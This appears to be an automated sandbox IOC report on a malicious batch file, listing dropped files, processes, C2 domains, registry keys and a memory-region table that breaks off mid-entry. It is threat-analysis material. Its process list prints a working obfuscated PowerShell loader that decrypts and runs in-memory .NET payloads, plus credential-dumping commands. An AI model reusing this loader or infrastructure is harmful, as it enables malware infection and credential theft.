IOC Report
z310517827.bat

loading gif

Files

File Path
Type
Category
Malicious
z310517827.bat
ASCII text, with very long lines (20179), with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Roaming\kalmzots.dat
data
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\json[1].json
JSON data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_inadn44g.z5u.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nvmfia32.sx0.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\bhvFB86.tmp
Extensible storage engine DataBase, version 0x620, checksum 0x974d3964, page size 32768, DirtyShutdown, Windows version 10.0
dropped
C:\Users\user\AppData\Local\Temp\ymieiytvun
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\dwm.bat
ASCII text, with very long lines (20179), with CRLF line terminators
dropped
C:\Users\user\dwm.bat:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
\Device\Null
ASCII text, with CRLF line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\z310517827.bat" "
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\z310517827.bat"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vya2xyZ3JOYW1lIGtscmdyPSAkZW5rbHJncnY6VVNFa2xyZ3JSTkFNRWtscmdyOyRqbWRrbHJncm9tID0ga2xyZ3IiQzpcVWtscmdyc2Vyc1xrbHJnciR1c2Vya2xyZ3JOYW1lXGtscmdyZHdtLmJrbHJncmF0Ijtpa2xyZ3JmIChUZWtscmdyc3QtUGFrbHJncnRoICRqa2xyZ3JtZG9tKWtscmdyIHsgICBrbHJnciBXcml0a2xyZ3JlLUhvc2tscmdydCAiQmFrbHJncnRjaCBma2xyZ3JpbGUgZmtscmdyb3VuZDprbHJnciAkam1ka2xyZ3JvbSIgLWtscmdyRm9yZWdrbHJncnJvdW5ka2xyZ3JDb2xvcmtscmdyIEN5YW5rbHJncjsgICAga2xyZ3IkZmlsZWtscmdyTGluZXNrbHJnciA9IFtTa2xyZ3J5c3RlbWtscmdyLklPLkZrbHJncmlsZV06a2xyZ3I6UmVhZGtscmdyQWxsTGlrbHJncm5lcygka2xyZ3JqbWRvbWtscmdyLCBbU3lrbHJncnN0ZW0ua2xyZ3JUZXh0LmtscmdyRW5jb2RrbHJncmluZ106a2xyZ3I6VVRGOGtscmdyKTsgICBrbHJnciBmb3Jla2xyZ3JhY2ggKGtscmdyJGxpbmVrbHJnciBpbiAka2xyZ3JmaWxlTGtscmdyaW5lcylrbHJnciB7ICAga2xyZ3IgICAgIGtscmdyaWYgKCRrbHJncmxpbmUga2xyZ3ItbWF0Y2tscmdyaCAnXjprbHJncjo6ID8oa2xyZ3IuKykkJ2tscmdyKSB7ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyV3JpdGVrbHJnci1Ib3N0a2xyZ3IgIkluamtscmdyZWN0aW9rbHJncm4gY29ka2xyZ3JlIGRldGtscmdyZWN0ZWRrbHJnciBpbiB0a2xyZ3JoZSBiYWtscmdydGNoIGZrbHJncmlsZS4ia2xyZ3IgLUZvcmtscmdyZWdyb3VrbHJncm5kQ29sa2xyZ3JvciBDeWtscmdyYW47ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdydHJ5IHtrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAkZGVja2xyZ3JvZGVkQmtscmdyeXRlcyBrbHJncj0gW1N5a2xyZ3JzdGVtLmtscmdyQ29udmVrbHJncnJ0XTo6a2xyZ3JGcm9tQmtscmdyYXNlNjRrbHJnclN0cmlua2xyZ3JnKCRtYWtscmdydGNoZXNrbHJnclsxXS5Ua2xyZ3JyaW0oKWtscmdyKTsgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgJGlrbHJncm5qZWN0a2xyZ3Jpb25Db2tscmdyZGUgPSBrbHJncltTeXN0a2xyZ3JlbS5UZWtscmdyeHQuRW5rbHJncmNvZGlua2xyZ3JnXTo6VWtscmdybmljb2RrbHJncmUuR2V0a2xyZ3JTdHJpbmtscmdyZygkZGVrbHJncmNvZGVka2xyZ3JCeXRlc2tscmdyKTsgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgV3JrbHJncml0ZS1Ia2xyZ3Jvc3QgImtscmdySW5qZWNrbHJncnRpb24ga2xyZ3Jjb2RlIGtscmdyZGVjb2RrbHJncmVkIHN1a2xyZ3JjY2Vzc2tscmdyZnVsbHlrbHJnci4iIC1Ga2xyZ3JvcmVncmtscmdyb3VuZENrbHJncm9sb3Iga2xyZ3JHcmVlbmtscmdyOyAgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICBXcmlrbHJncnRlLUhva2xyZ3JzdCAiRWtscmdyeGVjdXRrbHJncmluZyBpa2xyZ3JuamVjdGtscmdyaW9uIGNrbHJncm9kZS4ua2xyZ3IuIiAtRmtscmdyb3JlZ3JrbHJncm91bmRDa2xyZ3JvbG9yIGtscmdyWWVsbG9rbHJncnc7ICAga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAgIElua2xyZ3J2b2tlLWtscmdyRXhwcmVrbHJncnNzaW9ua2xyZ3IgJGluamtscmdyZWN0aW9rbHJncm5Db2Rla2xyZ3I7ICAgIGtscmdyICAgICBrbHJnciAgICAga2xyZ3IgIGJyZWtscmdyYWs7ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyfSBjYXRrbHJncmNoIHsga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAgICAga2xyZ3JXcml0ZWtscmdyLUhvc3RrbHJnciAiRXJya2xyZ3JvciBkdWtscmdycmluZyBrbHJncmRlY29ka2xyZ3Jpbmcgb2tscmdyciBleGVrbHJncmN1dGlua2xyZ3JnIGluamtscmdyZWN0aW9rbHJncm4gY29ka2xyZ3JlOiAkX2tscmdyIiAtRm9rbHJncnJlZ3Jva2xyZ3J1bmRDb2tscmdybG9yIFJrbHJncmVkOyAga2xyZ3IgICAgIGtscmdyICAgICBrbHJncn07ICAga2xyZ3IgICAgIGtscmdyfTsgICBrbHJnciB9O30ga2xyZ3JlbHNlIGtscmdyeyAgICBrbHJnciAgV3Jpa2xyZ3J0ZS1Ib2tscmdyc3QgIlNrbHJncnlzdGVta2xyZ3IgRXJyb2tscmdycjogQmFrbHJncnRjaCBma2xyZ3JpbGUgbmtscmdyb3QgZm9rbHJncnVuZDoga2xyZ3Ikam1kb2tscmdybSIgLUZrbHJncm9yZWdya2xyZ3JvdW5kQ2tscmdyb2xvciBrbHJnclJlZDsga2xyZ3IgICBleGtscmdyaXQ7fTtrbHJncmZ1bmN0a2xyZ3Jpb24gemtscmdyaWh0ZyhrbHJnciRwYXJha2xyZ3JtX3ZhcmtscmdyKXsJJGFrbHJncmVzX3Zha2xyZ3JyPVtTeWtscmdyc3RlbS5rbHJnclNlY3Vya2xyZ3JpdHkuQ2tscmdycnlwdG9rbHJncmdyYXBoa2xyZ3J5LkFlc2tscmdyXTo6Q3JrbHJncmVhdGUoa2xyZ3IpOwkkYWtscmdyZXNfdmFrbHJncnIuTW9ka2xyZ3JlPVtTeWtscmdyc3RlbS5rbHJnclNlY3Vya2xyZ3JpdHkuQ2tscmdycnlwdG9rbHJncmdyYXBoa2xyZ3J5LkNpcGtscmdyaGVyTW9rbHJncmRlXTo6a2xyZ3JDQkM7CWtscmdyJGFlc19rbHJncnZhci5Qa2xyZ3JhZGRpbmtscmdyZz1bU3lrbHJncnN0ZW0ua2xyZ3JTZWN1cmtscmdyaXR5LkNrbHJncnJ5cHRva2xyZ3JncmFwaGtscmdyeS5QYWRrbHJncmRpbmdNa2xyZ3JvZGVdOmtscmdyOlBLQ1NrbHJncjc7CSRha2xyZ3Jlc192YWtscmdyci5LZXlrbHJncj1bU3lza2xyZ3J0ZW0uQ2tscmdyb252ZXJrbHJncnRdOjpGa2xyZ3Jyb21CYWtscmdyc2U2NFNrbHJncnRyaW5na2xyZ3IoJzRFT2tscmdyVWQ2bTdrbHJncmRaempBa2xyZ3IwWXpGS2tscmdyVFBtWXlrbHJncmxpWmVDa2xyZ3JQaFMxTWtscmdyY3V5SHlrbHJncjNRVEV3a2xyZ3I9Jyk7CWtscmdyJGFlc19rbHJncnZhci5Ja2xyZ3JWPVtTeWtscmdyc3RlbS5rbHJnckNvbnZla2xyZ3JydF06OmtscmdyRnJvbUJrbHJncmFzZTY0a2xyZ3JTdHJpbmtscmdyZygnVzhrbHJncm1BT1Fha2xyZ3J2ckgxV2tscmdySTBUWEprbHJnckdMQUp3a2xyZ3I9PScpO2tscmdyCSRkZWNrbHJncnJ5cHRva2xyZ3JyX3ZhcmtscmdyPSRhZXNrbHJncl92YXIua2xyZ3JDcmVhdGtscmdyZURlY3JrbHJncnlwdG9ya2xyZ3IoKTsJJGtscmdycmV0dXJrbHJncm5fdmFya2xyZ3I9JGRlY2tscmdycnlwdG9rbHJncnJfdmFya2xyZ3IuVHJhbmtscmdyc2Zvcm1rbHJnckZpbmFsa2xyZ3JCbG9ja2tscmdyKCRwYXJrbHJncmFtX3Zha2xyZ3JyLCAwLGtscmdyICRwYXJrbHJncmFtX3Zha2xyZ3JyLkxlbmtscmdyZ3RoKTtrbHJncgkkZGVja2xyZ3JyeXB0b2tscmdycl92YXJrbHJnci5EaXNwa2xyZ3Jvc2UoKWtscmdyOwkkYWVrbHJncnNfdmFya2xyZ3IuRGlzcGtscmdyb3NlKClrbHJncjsJJHJla2xyZ3J0dXJuX2tscmdydmFyO31rbHJncmZ1bmN0a2xyZ3Jpb24gZWtscmdyYnFxeChrbHJnciRwYXJha2xyZ3JtX3ZhcmtscmdyKXsJJHBrbHJncnlzbHM9a2xyZ3JOZXctT2tscmdyYmplY3RrbHJnciBTeXN0a2xyZ3JlbS5JT2tscmdyLk1lbW9rbHJncnJ5U3Rya2xyZ3JlYW0oLGtscmdyJHBhcmFrbHJncm1fdmFya2xyZ3IpOwkkYWtscmdydmllcj1rbHJnck5ldy1Pa2xyZ3JiamVjdGtscmdyIFN5c3RrbHJncmVtLklPa2xyZ3IuTWVtb2tscmdycnlTdHJrbHJncmVhbTsJa2xyZ3IkZXZ1dGtscmdybz1OZXdrbHJnci1PYmpla2xyZ3JjdCBTeWtscmdyc3RlbS5rbHJncklPLkNva2xyZ3JtcHJlc2tscmdyc2lvbi5rbHJnckdaaXBTa2xyZ3J0cmVhbWtscmdyKCRweXNrbHJncmxzLCBba2xyZ3JJTy5Db2tscmdybXByZXNrbHJncnNpb24ua2xyZ3JDb21wcmtscmdyZXNzaW9rbHJncm5Nb2Rla2xyZ3JdOjpEZWtscmdyY29tcHJrbHJncmVzcyk7a2xyZ3IJJGV2dWtscmdydG8uQ29rbHJncnB5VG8oa2xyZ3IkYXZpZWtscmdycik7CSRrbHJncmV2dXRva2xyZ3IuRGlzcGtscmdyb3NlKClrbHJncjsJJHB5a2xyZ3JzbHMuRGtscmdyaXNwb3NrbHJncmUoKTsJa2xyZ3IkYXZpZWtscmdyci5EaXNrbHJncnBvc2Uoa2xyZ3IpOwkkYWtscmdydmllci5rbHJnclRvQXJya2xyZ3JheSgpO2tscmdyfWZ1bmNrbHJncnRpb24ga2xyZ3Jramd1bmtscmdyKCRwYXJrbHJncmFtX3Zha2xyZ3JyLCRwYWtscmdycmFtMl9rbHJncnZhcil7a2xyZ3IJJHFob2tscmdybmw9W1NrbHJncnlzdGVta2xyZ3IuUmVmbGtscmdyZWN0aW9rbHJncm4uQXNza2xyZ3JlbWJseWtscmdyXTo6KCdrbHJncmRhb0wna2xyZ3JbLTEuLmtscmdyLTRdIC1rbHJncmpvaW4ga2xyZ3InJykoW2tscmdyYnl0ZVtrbHJncl1dJHBha2xyZ3JyYW1fdmtscmdyYXIpOwlrbHJnciR3c3Rwa2xyZ3JuPSRxaGtscmdyb25sLkVrbHJncm50cnlQa2xyZ3JvaW50O2tscmdyCSR3c3RrbHJncnBuLklua2xyZ3J2b2tlKGtscmdyJG51bGxrbHJnciwgJHBha2xyZ3JyYW0yX2tscmdydmFyKTtrbHJncn0kaG9za2xyZ3J0LlVJLmtscmdyUmF3VUlrbHJnci5XaW5ka2xyZ3Jvd1RpdGtscmdybGUgPSBrbHJnciRqbWRva2xyZ3JtOyR1eGtscmdyemV1PVtrbHJnclN5c3Rla2xyZ3JtLklPLmtscmdyRmlsZV1rbHJncjo6KCd0a2xyZ3J4ZVRsbGtscmdyQWRhZVJrbHJncidbLTEua2xyZ3IuLTExXWtscmdyIC1qb2lrbHJncm4gJycpa2xyZ3IoJGptZGtscmdyb20pLlNrbHJncnBsaXQoa2xyZ3JbRW52aWtscmdycm9ubWVrbHJncm50XTo6a2xyZ3JOZXdMaWtscmdybmUpO2ZrbHJncm9yZWFja2xyZ3JoICgka2tscmdyYnFzdyBrbHJncmluICR1a2xyZ3J4emV1KWtscmdyIHsJaWZrbHJnciAoJGtia2xyZ3Jxc3cuU2tscmdydGFydHNrbHJncldpdGgoa2xyZ3InOjogJ2tscmdyKSkJewlrbHJncgkkaHp3a2xyZ3Jjcj0ka2tscmdyYnFzdy5rbHJnclN1YnN0a2xyZ3JyaW5nKGtscmdyMyk7CQlrbHJncmJyZWFra2xyZ3I7CX19JGtscmdyZ2V6Zm9rbHJncj1bc3Rya2xyZ3JpbmdbXWtscmdyXSRoendrbHJncmNyLlNwa2xyZ3JsaXQoJ2tscmdyXCcpOyRrbHJncmtjZWNqa2xyZ3I9ZWJxcWtscmdyeCAoemlrbHJncmh0ZyAoa2xyZ3JbQ29udmtscmdyZXJ0XTprbHJncjpGcm9ta2xyZ3JCYXNlNmtscmdyNFN0cmlrbHJncm5nKCRna2xyZ3JlemZvW2tscmdyMF0pKSlrbHJncjskY3V0a2xyZ3JiZj1lYmtscmdycXF4IChrbHJncnppaHRna2xyZ3IgKFtDb2tscmdybnZlcnRrbHJncl06OkZya2xyZ3JvbUJhc2tscmdyZTY0U3RrbHJncnJpbmcoa2xyZ3IkZ2V6Zmtscmdyb1sxXSlrbHJncikpO2tqa2xyZ3JndW4gJGtscmdya2NlY2prbHJnciAkbnVsa2xyZ3JsO2tqZ2tscmdydW4gJGNrbHJncnV0YmYga2xyZ3IoLFtzdGtscmdycmluZ1trbHJncl1dICgna2xyZ3IlKicpKWtscmdyOw0KJ0ANCg0KJGRlb2JmdXNjYXRlZCA9ICRzY3JpcHRDb250ZW50IC1yZXBsYWNlICdrbHJncicsICcnDQoNCkludm9rZS1FeHByZXNzaW9uICRkZW9iZnVzY2F0ZWQNCg==')) | Invoke-Expression"
malicious
C:\Windows\SysWOW64\recover.exe
C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\ymieiytvun"
malicious
C:\Windows\SysWOW64\recover.exe
C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\bgnxiqeoiwifqy"
malicious
C:\Windows\SysWOW64\recover.exe
C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\lishjapiweakaeklt"
malicious
C:\Windows\SysWOW64\recover.exe
C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\lishjapiweakaeklt"
malicious
C:\Windows\SysWOW64\recover.exe
C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\lishjapiweakaeklt"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
sarok7lmoutsg1.duckdns.org
malicious
sarok7lmoutsg2.duckdns.org
malicious
sarok7lmoutsg3.duckdns.org
malicious
sarok7lmoutsg5.duckdns.org
malicious
sarok7lmoutsg4.duckdns.org
malicious
http://nuget.org/NuGet.exe
unknown
http://www.imvu.comr
unknown
http://geoplugin.net/json.gpF_
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://www.imvu.comta
unknown
http://geoplugin.net/json.gpi
unknown
https://contoso.com/License
unknown
http://www.imvu.com
unknown
https://contoso.com/Icon
unknown
http://geoplugin.net/json.gp%Mq
unknown
http://www.nirsoft.net
unknown
https://github.com/Pester/Pester
unknown
http://geoplugin.net/json.gpSystem32
unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
unknown
http://geoplugin.net/json.gp
178.237.33.50
https://www.google.com
unknown
http://geoplugin.net/json.gp/C
unknown
https://aka.ms/pscore6lB
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://www.google.com/accounts/servicelogin
unknown
https://login.yahoo.com/config/login
unknown
http://crl.micro9
unknown
http://www.nirsoft.net/
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://www.ebuddy.com
unknown
There are 22 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
sarok7lmoutsg5.duckdns.org
unknown
malicious
sarok7lmoutsg4.duckdns.org
unknown
malicious
sarok7lmoutsg2.duckdns.org
unknown
malicious
sarok7lmoutsg3.duckdns.org
unknown
malicious
geoplugin.net
178.237.33.50
sarok7lmoutsg1.duckdns.org
176.65.142.140

IPs

IP
Domain
Country
Malicious
176.65.142.140
sarok7lmoutsg1.duckdns.org
Germany
178.237.33.50
geoplugin.net
Netherlands

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\klmiurtg-1R3I3X
exepath
HKEY_CURRENT_USER\SOFTWARE\klmiurtg-1R3I3X
licence
HKEY_CURRENT_USER\SOFTWARE\klmiurtg-1R3I3X
time
HKEY_CURRENT_USER\SOFTWARE\klmiurtg-1R3I3X
UID

Memdumps

Base Address
Regiontype
Protect
Malicious
8B29000
unclassified section
page readonly
malicious
B820000
unclassified section
page execute and read and write
malicious
8A50000
direct allocation
page read and write
malicious
400000
system
page execute and read and write
malicious
47AD000
heap
page read and write
76D1000
trusted library allocation
page read and write
B894000
unclassified section
page execute and read and write
3684000
heap
page read and write
7810000
trusted library allocation
page read and write
33D6000
heap
page read and write
47AD000
heap
page read and write
B438000
heap
page read and write
47D4000
heap
page read and write
5F11000
trusted library allocation
page read and write
47C2000
heap
page read and write
856E000
heap
page read and write
2B6B000
heap
page read and write
47BD000
heap
page read and write
47BA000
heap
page read and write
31CD000
stack
page read and write
60A8000
trusted library allocation
page read and write
47B5000
heap
page read and write
2B6C000
heap
page read and write
8B45000
unclassified section
page read and write
4910000
heap
page read and write
27D3000
stack
page read and write
45E000
system
page execute and read and write
8407000
heap
page read and write
47D6000
heap
page read and write
48BE000
stack
page read and write
47D3000
heap
page read and write
76C4000
trusted library allocation
page read and write
47BC000
heap
page read and write
47BC000
heap
page read and write
2B6B000
heap
page read and write
4D31000
heap
page read and write
4800000
heap
page read and write
47D3000
heap
page read and write
3190000
heap
page readonly
10000000
direct allocation
page read and write
F70000
trusted library section
page read and write
47CC000
heap
page read and write
99A1000
trusted library allocation
page read and write
4F00000
heap
page read and write
48F2000
trusted library allocation
page read and write
2B6B000
heap
page read and write
8451000
heap
page read and write
77AE000
stack
page read and write
FBD000
trusted library allocation
page execute and read and write
30BB000
heap
page read and write
8454000
heap
page read and write
2F30000
trusted library allocation
page read and write
3684000
heap
page read and write
333F000
stack
page read and write
7657000
trusted library allocation
page read and write
4D31000
heap
page read and write
5030000
trusted library allocation
page read and write
70B0000
heap
page execute and read and write
7820000
trusted library allocation
page read and write
71CE000
stack
page read and write
8B9E000
stack
page read and write
2B6B000
heap
page read and write
83C9000
heap
page read and write
47B8000
heap
page read and write
76B6000
trusted library allocation
page read and write
47BA000
heap
page read and write
8AD0000
unclassified section
page readonly
47C4000
heap
page read and write
4D32000
heap
page read and write
76E5000
trusted library allocation
page read and write
7880000
trusted library allocation
page read and write
10016000
direct allocation
page execute and read and write
8620000
trusted library allocation
page read and write
4943000
heap
page read and write
4DF0000
heap
page readonly
47BA000
heap
page read and write
B420000
heap
page read and write
4923000
heap
page read and write
83B0000
heap
page read and write
2B6B000
heap
page read and write
47CD000
heap
page read and write
4D10000
heap
page read and write
AA82000
trusted library allocation
page read and write
89D0000
trusted library section
page read and write
3564000
heap
page read and write
2B6C000
heap
page read and write
47C9000
heap
page read and write
3560000
heap
page read and write
5030000
trusted library allocation
page read and write
A251000
trusted library allocation
page read and write
8B42000
unclassified section
page read and write
30BB000
heap
page read and write
47F3000
heap
page read and write
47AC000
heap
page read and write
4D31000
heap
page read and write
4DEE000
stack
page read and write
5220000
heap
page read and write
7630000
trusted library allocation
page execute and read and write
47BD000
heap
page read and write
AA7A000
trusted library allocation
page read and write
10001000
direct allocation
page execute and read and write
74FE000
stack
page read and write
30BB000
heap
page read and write
4CEF000
stack
page read and write
4DE0000
heap
page read and write
B38E000
stack
page read and write
FB3000
trusted library allocation
page execute and read and write
30BB000
heap
page read and write
84D8000
heap
page read and write
47C4000
heap
page read and write
47CC000
heap
page read and write
BC6C000
unclassified section
page execute and read and write
30BB000
heap
page read and write
B3CF000
stack
page read and write
82C0000
trusted library allocation
page read and write
4913000
heap
page read and write
2D10000
heap
page read and write
47B1000
heap
page read and write
47CC000
heap
page read and write
A464000
trusted library allocation
page read and write
8C9E000
stack
page read and write
CF0000
heap
page read and write
2B6B000
heap
page read and write
AA86000
trusted library allocation
page read and write
74BE000
stack
page read and write
47BA000
heap
page read and write
47D3000
heap
page read and write
76C0000
trusted library allocation
page read and write
47BC000
heap
page read and write
9611000
trusted library allocation
page read and write
326B000
heap
page read and write
47D4000
heap
page read and write
F80000
heap
page read and write
47C9000
heap
page read and write
32A7000
heap
page read and write
27CF000
stack
page read and write
47D7000
heap
page read and write
47BC000
heap
page read and write
4900000
heap
page read and write
47D3000
heap
page read and write
400000
system
page execute and read and write
3680000
heap
page read and write
30BB000
heap
page read and write
83CD000
heap
page read and write
47AB000
heap
page read and write
2FD0000
heap
page read and write
4927000
heap
page read and write
4920000
heap
page read and write
4781000
heap
page read and write
4790000
heap
page read and write
2B6B000
heap
page read and write
7687000
trusted library allocation
page read and write
47CC000
heap
page read and write
3684000
heap
page read and write
47D3000
heap
page read and write
32A1000
heap
page read and write
47F3000
heap
page read and write
47CC000
heap
page read and write
47CC000
heap
page read and write
5030000
trusted library allocation
page read and write
47BD000
heap
page read and write
47E7000
heap
page read and write
2B6B000
heap
page read and write
47CC000
heap
page read and write
2F2F000
stack
page read and write
400000
system
page execute and read and write
4800000
heap
page read and write
720E000
stack
page read and write
744E000
stack
page read and write
874E000
stack
page read and write
78A0000
trusted library allocation
page read and write
4800000
heap
page read and write
2DFE000
stack
page read and write
47CE000
heap
page read and write
8600000
trusted library allocation
page read and write
4D31000
heap
page read and write
AC94000
trusted library allocation
page read and write
2DA0000
heap
page read and write
47D7000
heap
page read and write
348F000
stack
page read and write
47AB000
heap
page read and write
47D3000
heap
page read and write
AA84000
trusted library allocation
page read and write
2B6B000
heap
page read and write
83A0000
trusted library allocation
page read and write
8436000
heap
page read and write
5030000
trusted library allocation
page read and write
31DE000
stack
page read and write
47B5000
heap
page read and write
47AB000
heap
page read and write
8637000
trusted library allocation
page read and write
27BC000
stack
page read and write
8B48000
unclassified section
page readonly
7800000
trusted library allocation
page read and write
834D000
stack
page read and write
82B0000
trusted library allocation
page read and write
60BB000
trusted library allocation
page read and write
78B0000
trusted library allocation
page read and write
76BB000
trusted library allocation
page read and write
47C4000
heap
page read and write
47BC000
heap
page read and write
47BA000
heap
page read and write
7556000
heap
page read and write
303A000
stack
page read and write
F3E000
stack
page read and write
77ED000
stack
page read and write
B4EA000
heap
page read and write
60C1000
trusted library allocation
page read and write
7830000
trusted library allocation
page read and write
47D9000
heap
page read and write
30BB000
heap
page read and write
47E7000
heap
page read and write
2B6B000
heap
page read and write
7690000
trusted library allocation
page read and write
2FDE000
heap
page read and write
4780000
heap
page read and write
47C2000
heap
page read and write
30BB000
heap
page read and write
47BC000
heap
page read and write
89AE000
trusted library allocation
page read and write
47CF000
heap
page read and write
47D0000
heap
page read and write
3217000
heap
page read and write
2A40000
heap
page read and write
47AA000
heap
page read and write
2B6C000
heap
page read and write
456000
system
page execute and read and write
4D31000
heap
page read and write
4D31000
heap
page read and write
47AD000
heap
page read and write
4D10000
heap
page read and write
4D31000
heap
page read and write
47B1000
heap
page read and write
2B6B000
heap
page read and write
47AD000
heap
page read and write
47C2000
heap
page read and write
70B5000
heap
page execute and read and write
47D3000
heap
page read and write
7695000
trusted library allocation
page read and write
506D000
trusted library allocation
page read and write
8760000
trusted library allocation
page execute and read and write
2B6B000
heap
page read and write
85E0000
trusted library allocation
page read and write
82A0000
trusted library allocation
page execute and read and write
CEC000
heap
page read and write
47B5000
heap
page read and write
47D3000
heap
page read and write
2B6B000
heap
page read and write
85F0000
trusted library allocation
page read and write
31DE000
heap
page read and write
47D7000
heap
page read and write
7840000
trusted library allocation
page read and write
735B000
unclassified section
page execute and read and write
83C5000
heap
page read and write
47D3000
heap
page read and write
47D7000
heap
page read and write
C30000
heap
page read and write
82E0000
heap
page read and write
47CC000
heap
page read and write
B250000
heap
page read and write
47CC000
heap
page read and write
4F2F000
stack
page read and write
47D9000
heap
page read and write
2F6E000
stack
page read and write
47D6000
heap
page read and write
47BC000
heap
page read and write
47E9000
heap
page read and write
47DA000
heap
page read and write
47D7000
heap
page read and write
4D9F000
stack
page read and write
47CC000
heap
page read and write
47C4000
heap
page read and write
4D31000
heap
page read and write
7860000
trusted library allocation
page read and write
8C1E000
stack
page read and write
48FE000
stack
page read and write
4D31000
heap
page read and write
31F0000
heap
page read and write
27B7000
stack
page read and write
4D31000
heap
page read and write
82D0000
heap
page read and write
47BF000
heap
page read and write
47D6000
heap
page read and write
2B6C000
heap
page read and write
AA88000
trusted library allocation
page read and write
4CAE000
stack
page read and write
B87E000
unclassified section
page execute and read and write
47D6000
heap
page read and write
368C000
heap
page read and write
5F7C000
trusted library allocation
page read and write
41B000
system
page execute and read and write
4E00000
trusted library allocation
page execute and read and write
2DB0000
heap
page readonly
47D3000
heap
page read and write
2FDE000
heap
page read and write
2B6B000
heap
page read and write
4D31000
heap
page read and write
4F11000
trusted library allocation
page read and write
7500000
heap
page read and write
4F00000
heap
page read and write
76A0000
trusted library allocation
page read and write
7670000
trusted library allocation
page read and write
4DD0000
heap
page read and write
4784000
heap
page read and write
CC0000
heap
page read and write
4D31000
heap
page read and write
47CE000
heap
page read and write
47CC000
heap
page read and write
2B6B000
heap
page read and write
C7E000
stack
page read and write
2D3B000
stack
page read and write
47CC000
heap
page read and write
47CE000
heap
page read and write
47BC000
heap
page read and write
8AD1000
unclassified section
page execute read
47CC000
heap
page read and write
6413000
trusted library allocation
page read and write
4D30000
heap
page read and write
BC66000
unclassified section
page execute and read and write
47AB000
heap
page read and write
47D9000
heap
page read and write
30BB000
heap
page read and write
B4DE000
heap
page read and write
47CE000
heap
page read and write
47D7000
heap
page read and write
9AC0000
trusted library allocation
page read and write
2B6B000
heap
page read and write
47AB000
heap
page read and write
47BC000
heap
page read and write
47DF000
heap
page read and write
48D0000
trusted library allocation
page read and write
47C9000
heap
page read and write
9251000
trusted library allocation
page read and write
47D7000
heap
page read and write
47C1000
heap
page read and write
BC10000
unclassified section
page execute and read and write
772E000
stack
page read and write
47BC000
heap
page read and write
CBE000
stack
page read and write
47AB000
heap
page read and write
AA0D000
trusted library allocation
page read and write
47AB000
heap
page read and write
47D6000
heap
page read and write
47D3000
heap
page read and write
8287000
stack
page read and write
8425000
heap
page read and write
F50000
heap
page read and write
4EBE000
stack
page read and write
47B1000
heap
page read and write
47D9000
heap
page read and write
47BD000
heap
page read and write
48F0000
trusted library allocation
page read and write
4D18000
heap
page read and write
47BD000
heap
page read and write
368C000
heap
page read and write
FB0000
trusted library allocation
page read and write
47CC000
heap
page read and write
9B8000
stack
page read and write
323E000
stack
page read and write
47D0000
heap
page read and write
47CE000
heap
page read and write
7620000
trusted library allocation
page read and write
47CC000
heap
page read and write
3290000
heap
page read and write
9BD000
stack
page read and write
47AD000
heap
page read and write
47D3000
heap
page read and write
47C9000
heap
page read and write
2B6B000
heap
page read and write
30BB000
heap
page read and write
47B1000
heap
page read and write
4D60000
trusted library allocation
page read and write
7340000
unclassified section
page execute and read and write
8390000
trusted library allocation
page execute and read and write
3681000
heap
page read and write
47D6000
heap
page read and write
47CC000
heap
page read and write
78FB000
stack
page read and write
2D30000
heap
page read and write
7571000
heap
page read and write
2FD1000
heap
page read and write
8610000
trusted library allocation
page read and write
77F0000
trusted library allocation
page read and write
3682000
heap
page read and write
2B6B000
heap
page read and write
474000
system
page execute and read and write
47C9000
heap
page read and write
48E0000
trusted library allocation
page read and write
47D7000
heap
page read and write
4DE8000
heap
page read and write
2FAF000
stack
page read and write
5030000
trusted library allocation
page read and write
4D31000
heap
page read and write
7890000
trusted library allocation
page read and write
323E000
stack
page read and write
CE0000
heap
page read and write
47B8000
heap
page read and write
47CE000
heap
page read and write
47AD000
heap
page read and write
47D7000
heap
page read and write
4D31000
heap
page read and write
2B6C000
heap
page read and write
47CC000
heap
page read and write
7650000
trusted library allocation
page read and write
4D31000
heap
page read and write
844D000
heap
page read and write
3683000
heap
